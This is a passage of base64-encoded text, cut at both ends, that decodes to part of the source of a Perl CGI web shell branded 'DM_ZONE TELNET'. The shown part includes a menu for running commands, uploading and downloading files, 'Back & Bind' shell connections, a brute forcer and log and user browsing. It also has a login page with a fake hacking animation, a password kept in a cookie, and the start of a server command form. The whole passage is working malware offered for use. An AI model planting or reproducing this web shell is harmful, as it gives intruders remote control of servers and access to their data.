KTsgcmV0dXJuIGZhbHNlOyI7DQoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9Ijxmb3JtIG5hbWU9Rm9ybVBlcm1zXyIgKyBpKyAiIGFjdGlvbj0nJyBtZXRob2Q9J1BPU1QnPjxpbnB1dCBpZD10ZXh0XyIgKyBpICsgIiAgbmFtZT1yZW5hbWUgdHlwZT10ZXh0IHZhbHVlPSAnIitmaWxlKyInIC8+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBhamF4ICsgIicgdmFsdWU9T0s+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBiYWNrICsgIicgdmFsdWU9Q2FuY2VsPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOw0KCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJ0ZXh0XyIgKyBpKS5mb2N1cygpOw0KfQ0KZnVuY3Rpb24gcm1fcmVuYW1lX2Zvcm0oaSxmaWxlLGYpDQp7DQoJaWYoZj09J2YnKQ0KCXsNCgkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9IjxhIGhyZWY9Jz9hPWNvbW1hbmQmZD0kZGlyJmM9ZWRpdCUyMCIrZmlsZSsiJTIwJz4iICtmaWxlKyAiPC9hPiI7DQoJfWVsc2UNCgl7DQoJCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJGaWxlXyIraSkuaW5uZXJIVE1MPSI8YSBocmVmPSc/YT1ndWkmZD0iK2YrIic+WyAiICtmaWxlKyAiIF08L2E+IjsNCgl9DQp9DQo8L3NjcmlwdD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5mb2N1cygpIiBiZ2NvbG9yPSIjMGMwYzBjIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiPg0KPGNlbnRlcj48Y29kZT4NCjx0YWJsZSBib3JkZXI9IjEiIHdpZHRoPSIxMDAlIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjIiPg0KPHRyPg0KCTx0ZCBhbGlnbj0iY2VudGVyIiByb3dzcGFuPTI+DQoJCTxiPjxmb250IHNpemU9IjUiPiRFZGl0UGVyc2lvbjwvZm9udD48L2I+DQoJPC90ZD4NCg0KCTx0ZD4NCg0KCQk8Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4kRU5WeyJTRVJWRVJfU09GVFdBUkUifTwvZm9udD4NCgk8L3RkPg0KCTx0ZD5TZXJ2ZXIgSVA6PGZvbnQgY29sb3I9IiNjYzAwMDAiPiAkRU5WeydTRVJWRVJfQUREUid9PC9mb250PiB8IFlvdXIgSVA6IDxmb250IGNvbG9yPSIjMDAwMDAwIj4kRU5WeydSRU1PVEVfQUREUid9PC9mb250Pg0KCTwvdGQ+DQoNCjwvdHI+DQoNCjx0cj4NCjx0ZCBjb2xzcGFuPSIzIj48Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4NCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbiI+SG9tZTwvYT4gfCANCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWNvbW1hbmQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkNvbW1hbmQ8L2E+IHwNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWd1aSZkPSRFbmNvZGVkQ3VycmVudERpciI+R1VJPC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCANCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWRvd25sb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5Eb3dubG9hZCBGaWxlPC9hPiB8DQoNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWJhY2tiaW5kIj5CYWNrICYgQmluZDwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9YnJ1dGVmb3JjZXIiPkJydXRlIEZvcmNlcjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Y2hlY2tsb2ciPkNoZWNrIExvZzwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG9tYWluc3VzZXIiPkRvbWFpbnMvVXNlcnM8L2E+IHwNCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWxvZ291dCI+TG9nb3V0PC9hPiB8DQo8YSB0YXJnZXQ9J19ibGFuaycgaHJlZj0iIyI+SGVscDwvYT4NCg0KPC9mb250PjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjxmb250IGlkPSJSZXNwb25zZURhdGEiIGNvbG9yPSIjZmY5OWNjIiA+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5TY3JlZW4NCnsNCg0KCXByaW50IDw8RU5EOw0KPHByZT48c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+DQpUeXBpbmdUZXh0ID0gZnVuY3Rpb24oZWxlbWVudCwgaW50ZXJ2YWwsIGN1cnNvciwgZmluaXNoZWRDYWxsYmFjaykgew0KICBpZigodHlwZW9mIGRvY3VtZW50LmdldEVsZW1lbnRCeUlkID09ICJ1bmRlZmluZWQiKSB8fCAodHlwZW9mIGVsZW1lbnQuaW5uZXJIVE1MID09ICJ1bmRlZmluZWQiKSkgew0KICAgIHRoaXMucnVubmluZyA9IHRydWU7CS8vIE5ldmVyIHJ1bi4NCiAgICByZXR1cm47DQogIH0NCiAgdGhpcy5lbGVtZW50ID0gZWxlbWVudDsNCiAgdGhpcy5maW5pc2hlZENhbGxiYWNrID0gKGZpbmlzaGVkQ2FsbGJhY2sgPyBmaW5pc2hlZENhbGxiYWNrIDogZnVuY3Rpb24oKSB7IHJldHVybjsgfSk7DQogIHRoaXMuaW50ZXJ2YWwgPSAodHlwZW9mIGludGVydmFsID09ICJ1bmRlZmluZWQiID8gMTAwIDogaW50ZXJ2YWwpOw0KICB0aGlzLm9yaWdUZXh0ID0gdGhpcy5lbGVtZW50LmlubmVySFRNTDsNCiAgdGhpcy51bnBhcnNlZE9yaWdUZXh0ID0gdGhpcy5vcmlnVGV4dDsNCiAgdGhpcy5jdXJzb3IgPSAoY3Vyc29yID8gY3Vyc29yIDogIiIpOw0KICB0aGlzLmN1cnJlbnRUZXh0ID0gIiI7DQogIHRoaXMuY3VycmVudENoYXIgPSAwOw0KICB0aGlzLmVsZW1lbnQudHlwaW5nVGV4dCA9IHRoaXM7DQogIGlmKHRoaXMuZWxlbWVudC5pZCA9PSAiIikgdGhpcy5lbGVtZW50LmlkID0gInR5cGluZ3RleHQiICsgVHlwaW5nVGV4dC5jdXJyZW50SW5kZXgrKzsNCiAgVHlwaW5nVGV4dC5hbGwucHVzaCh0aGlzKTsNCiAgdGhpcy5ydW5uaW5nID0gZmFsc2U7DQogIHRoaXMuaW5UYWcgPSBmYWxzZTsNCiAgdGhpcy50YWdCdWZmZXIgPSAiIjsNCiAgdGhpcy5pbkhUTUxFbnRpdHkgPSBmYWxzZTsNCiAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiI7DQp9DQpUeXBpbmdUZXh0LmFsbCA9IG5ldyBBcnJheSgpOw0KVHlwaW5nVGV4dC5jdXJyZW50SW5kZXggPSAwOw0KVHlwaW5nVGV4dC5ydW5BbGwgPSBmdW5jdGlvbigpIHsNCiAgZm9yKHZhciBpID0gMDsgaSA8IFR5cGluZ1RleHQuYWxsLmxlbmd0aDsgaSsrKSBUeXBpbmdUZXh0LmFsbFtpXS5ydW4oKTsNCn0NClR5cGluZ1RleHQucHJvdG90eXBlLnJ1biA9IGZ1bmN0aW9uKCkgew0KICBpZih0aGlzLnJ1bm5pbmcpIHJldHVybjsNCiAgaWYodHlwZW9mIHRoaXMub3JpZ1RleHQgPT0gInVuZGVmaW5lZCIpIHsNCiAgICBzZXRUaW1lb3V0KCJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnIiArIHRoaXMuZWxlbWVudC5pZCArICInKS50eXBpbmdUZXh0LnJ1bigpIiwgdGhpcy5pbnRlcnZhbCk7CS8vIFdlIGhhdmVuJ3QgZmluaXNoZWQgbG9hZGluZyB5ZXQuICBIYXZlIHBhdGllbmNlLg0KICAgIHJldHVybjsNCiAgfQ0KICBpZih0aGlzLmN1cnJlbnRUZXh0ID09ICIiKSB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MID0gIiI7DQovLyAgdGhpcy5vcmlnVGV4dCA9IHRoaXMub3JpZ1RleHQucmVwbGFjZSgvPChbXjxdKSo+LywgIiIpOyAgICAgLy8gU3RyaXAgSFRNTCBmcm9tIHRleHQuDQogIGlmKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCkgew0KICAgIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI8IiAmJiAhdGhpcy5pblRhZykgew0KICAgICAgdGhpcy50YWdCdWZmZXIgPSAiPCI7DQogICAgICB0aGlzLmluVGFnID0gdHJ1ZTsNCiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsNCiAgICAgIHRoaXMucnVuKCk7DQogICAgICByZXR1cm47DQogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI+IiAmJiB0aGlzLmluVGFnKSB7DQogICAgICB0aGlzLnRhZ0J1ZmZlciArPSAiPiI7DQogICAgICB0aGlzLmluVGFnID0gZmFsc2U7DQogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMudGFnQnVmZmVyOw0KICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOw0KICAgICAgdGhpcy5ydW4oKTsNCiAgICAgIHJldHVybjsNCiAgICB9IGVsc2UgaWYodGhpcy5pblRhZykgew0KICAgICAgdGhpcy50YWdCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSBpZih0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKSA9PSAiJiIgJiYgIXRoaXMuaW5IVE1MRW50aXR5KSB7DQogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgPSAiJiI7DQogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IHRydWU7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSBpZih0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKSA9PSAiOyIgJiYgdGhpcy5pbkhUTUxFbnRpdHkpIHsNCiAgICAgIHRoaXMuSFRNTEVudGl0eUJ1ZmZlciArPSAiOyI7DQogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IGZhbHNlOw0KICAgICAgdGhpcy5jdXJyZW50VGV4dCArPSB0aGlzLkhUTUxFbnRpdHlCdWZmZXI7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSBpZih0aGlzLmluSFRNTEVudGl0eSkgew0KICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyICs9IHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpOw0KICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOw0KICAgICAgdGhpcy5ydW4oKTsNCiAgICAgIHJldHVybjsNCiAgICB9IGVsc2Ugew0KICAgICAgdGhpcy5jdXJyZW50VGV4dCArPSB0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKTsNCiAgICB9DQogICAgdGhpcy5lbGVtZW50LmlubmVySFRNTCA9IHRoaXMuY3VycmVudFRleHQ7DQogICAgdGhpcy5lbGVtZW50LmlubmVySFRNTCArPSAodGhpcy5jdXJyZW50Q2hhciA8IHRoaXMub3JpZ1RleHQubGVuZ3RoIC0gMSA/ICh0eXBlb2YgdGhpcy5jdXJzb3IgPT0gImZ1bmN0aW9uIiA/IHRoaXMuY3Vyc29yKHRoaXMuY3VycmVudFRleHQpIDogdGhpcy5jdXJzb3IpIDogIiIpOw0KICAgIHRoaXMuY3VycmVudENoYXIrKzsNCiAgICBzZXRUaW1lb3V0KCJkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnIiArIHRoaXMuZWxlbWVudC5pZCArICInKS50eXBpbmdUZXh0LnJ1bigpIiwgdGhpcy5pbnRlcnZhbCk7DQogIH0gZWxzZSB7DQoJdGhpcy5jdXJyZW50VGV4dCA9ICIiOw0KCXRoaXMuY3VycmVudENoYXIgPSAwOw0KICAgICAgICB0aGlzLnJ1bm5pbmcgPSBmYWxzZTsNCiAgICAgICAgdGhpcy5maW5pc2hlZENhbGxiYWNrKCk7DQogIH0NCn0NCjwvc2NyaXB0Pg0KPC9wcmU+DQoNCg0KPHRhYmxlIGFsaWduPSJjZW50ZXIiIGJvcmRlcj0iMSIgd2lkdGg9IjYwMCIgaGVpZ2g+DQo8dGJvZHk+PHRyPg0KPHRkIHZhbGlnbj0idG9wIiBiYWNrZ3JvdW5kPSJodHRwOi8vZGwuZHJvcGJveC5jb20vdS8xMDg2MDA1MS9pbWFnZXMvbWF0cmFuLmdpZiI+PHAgaWQ9ImhhY2siIHN0eWxlPSJtYXJnaW4tbGVmdDogM3B4OyI+DQo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+IFBsZWFzZSBXYWl0IC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+IDxicj4NCg0KPGZvbnQgY29sb3I9IiMwMDk5MDAiPiBUcnlpbmcgY29ubmVjdCB0byBTZXJ2ZXIgLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLjwvZm9udD48YnI+DQo8Zm9udCBjb2xvcj0iI0YwMDAwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPn5cJDwvZm9udD4gQ29ubmVjdGVkICEgPC9mb250Pjxicj4NCjxmb250IGNvbG9yPSIjMDA5OTAwIj48Zm9udCBjb2xvcj0iI0ZGRjAwMCI+JFNlcnZlck5hbWV+PC9mb250PiBDaGVja2luZyBTZXJ2ZXIgLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLiAuIC4gLjwvZm9udD4gPGJyPg0KDQo8Zm9udCBjb2xvcj0iIzAwOTkwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPiRTZXJ2ZXJOYW1lfjwvZm9udD4gVHJ5aW5nIGNvbm5lY3QgdG8gQ29tbWFuZCAuIC4gLiAuIC4gLiAuIC4gLiAuIC48L2ZvbnQ+PGJyPg0KDQo8Zm9udCBjb2xvcj0iI0YwMDAwMCI+PGZvbnQgY29sb3I9IiNGRkYwMDAiPiRTZXJ2ZXJOYW1lfjwvZm9udD5cJCBDb25uZWN0ZWQgQ29tbWFuZCEgPC9mb250Pjxicj4NCjxmb250IGNvbG9yPSIjMDA5OTAwIj48Zm9udCBjb2xvcj0iI0ZGRjAwMCI+JFNlcnZlck5hbWV+PGZvbnQgY29sb3I9IiNGMDAwMDAiPlwkPC9mb250PjwvZm9udD4gT0tFIENPSyAhISE8L2ZvbnQ+DQo8L3RyPg0KPC90Ym9keT48L3RhYmxlPg0KPGJyPg0KDQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+DQpuZXcgVHlwaW5nVGV4dChkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaGFjayIpLCAzMCwgZnVuY3Rpb24oaSl7IHZhciBhciA9IG5ldyBBcnJheSgiXyIsIiIpOyByZXR1cm4gIiAiICsgYXJbaS5sZW5ndGggJSBhci5sZW5ndGhdOyB9KTsNClR5cGluZ1RleHQucnVuQWxsKCk7DQoNCjwvc2NyaXB0Pg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQWRkIGh0bWwgc3BlY2lhbCBjaGFycw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEh0bWxTcGVjaWFsQ2hhcnMoJCl7DQoJbXkgJHRleHQgPSBzaGlmdDsNCgkkdGV4dCA9fiBzLyYvJmFtcDsvZzsNCgkkdGV4dCA9fiBzLyIvJnF1b3Q7L2c7DQoJJHRleHQgPX4gcy8nLyYjMDM5Oy9nOw0KCSR0ZXh0ID1+IHMvPC8mbHQ7L2c7DQoJJHRleHQgPX4gcy8+LyZndDsvZzsNCglyZXR1cm4gJHRleHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEFkZCBsaW5rIGZvciBkaXJlY3RvcnkNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBBZGRMaW5rRGlyKCQpDQp7DQoJbXkgJGFjPXNoaWZ0Ow0KCW15IEBkaXI9KCk7DQoJaWYoJFdpbk5UKQ0KCXsNCgkJQGRpcj1zcGxpdCgvXFwvLCRDdXJyZW50RGlyKTsNCgl9ZWxzZQ0KCXsNCgkJQGRpcj1zcGxpdCgiLyIsJnRyaW0oJEN1cnJlbnREaXIpKTsNCgl9DQoJbXkgJHBhdGg9IiI7DQoJbXkgJHJlc3VsdD0iIjsNCglmb3JlYWNoIChAZGlyKQ0KCXsNCgkJJHBhdGggLj0gJF8uJFBhdGhTZXA7DQoJCSRyZXN1bHQuPSI8YSBocmVmPSc/YT0iLiRhYy4iJmQ9Ii4kcGF0aC4iJz4iLiRfLiRQYXRoU2VwLiI8L2E+IjsNCgl9DQoJcmV0dXJuICRyZXN1bHQ7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGJyPkxvZ2luIDogRE1fWk9ORTxicj4NCg0KUGFzc3dvcmQgU2FsYWggQ29rIDpwPGJyPjxicj4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxmb3JtIG5hbWU9ImYiIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIkU2NyaXB0TG9jYXRpb24iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImxvZ2luIj4NCkxvZ2luIDogRE1fWk9ORTxicj4NClBhc3N3b3JkOjxpbnB1dCB0eXBlPSJwYXNzd29yZCIgbmFtZT0icCI+DQo8aW5wdXQgY2xhc3M9InN1Ym1pdCIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iID4+ICI+DQo8L2Zvcm0+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIGZvb3RlciBmb3IgdGhlIEhUTUwgUGFnZQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUZvb3Rlcg0Kew0KCXByaW50ICI8YnI+PGZvbnQgY29sb3I9cmVkPm8tLS1bICBETV9aT05FIFRFTE5FVCAgXS0tLW88L2ZvbnQ+PC9jb2RlPjwvY2VudGVyPjwvYm9keT48L2h0bWw+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBSZXRyZWl2ZXMgdGhlIHZhbHVlcyBvZiBhbGwgY29va2llcy4gVGhlIGNvb2tpZXMgY2FuIGJlIGFjY2Vzc2VzIHVzaW5nIHRoZQ0KIyB2YXJpYWJsZSAkQ29va2llc3snJ30NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBHZXRDb29raWVzDQp7DQoJQGh0dHBjb29raWVzID0gc3BsaXQoLzsgLywkRU5WeydIVFRQX0NPT0tJRSd9KTsNCglmb3JlYWNoICRjb29raWUoQGh0dHBjb29raWVzKQ0KCXsNCgkJKCRpZCwgJHZhbCkgPSBzcGxpdCgvPS8sICRjb29raWUpOw0KCQkkQ29va2llc3skaWR9ID0gJHZhbDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBzY3JlZW4gd2hlbiB0aGUgdXNlciBsb2dzIG91dA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9nb3V0U2NyZWVuDQp7DQoJcHJpbnQgIkxPRyBPVVQgU1VLU0VTIENPSyA6UDxicj48YnI+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2luIGFnYWluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ291dA0Kew0KCXByaW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUNCgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJJlByaW50TG9nb3V0U2NyZWVuOw0KDQoJJlByaW50TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQoJZXhpdDsNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBUaGlzIGZ1bmN0aW9uIGlzIGNhbGxlZCB0byBsb2dpbiB0aGUgdXNlci4gSWYgdGhlIHBhc3N3b3JkIG1hdGNoZXMsIGl0DQojIGRpc3BsYXlzIGEgcGFnZSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBydW4gY29tbWFuZHMuIElmIHRoZSBwYXNzd29yZCBkb2Vucyd0DQojIG1hdGNoIG9yIGlmIG5vIHBhc3N3b3JkIGlzIGVudGVyZWQsIGl0IGRpc3BsYXlzIGEgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlcg0KIyB0byBsb2dpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBlcmZvcm1Mb2dpbiANCnsNCglpZigkTG9naW5QYXNzd29yZCBlcSAkUGFzc3dvcmQpICMgcGFzc3dvcmQgbWF0Y2hlZA0KCXsNCgkJcHJpbnQgIlNldC1Db29raWU6IFNBVkVEUFdEPSRMb2dpblBhc3N3b3JkO1xuIjsNCgkJJlByaW50UGFnZUhlYWRlcjsNCgkJcHJpbnQgJkxpc3REaXI7DQoJfQ0KCWVsc2UgIyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkJJlByaW50TG9naW5TY3JlZW47DQoJCWlmKCRMb2dpblBhc3N3b3JkIG5lICIiKSAjIHNvbWUgcGFzc3dvcmQgd2FzIGVudGVyZWQNCgkJew0KCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOw0KDQoJCX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCQlleGl0Ow0KCX0NCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCglteSAkZGlyPSAiPHNwYW4gc3R5bGU9J2ZvbnQ6IDExcHQgVmVyZGFuYTsgZm9udC13ZWlnaHQ6IGJvbGQ7Jz4iLiZBZGRMaW5rRGlyKCJjb21tYW5kIikuIjwvc3Bhbj4iOw0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJGRpciA+ICIgOiAiPGZvbnQgY29sb3I9JyM2NmZmNjYnPlthZG1pblxAJFNlcnZlck5hbWUgJGRpcl1cJDwvZm9udD4gIjsNCglyZXR1cm4gPDxFTkQ7DQo8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImNvbW1hbmQiPg0KDQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0KJFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIHNpemU9IjUwIiBuYW1lPSJjIj4NCjxpb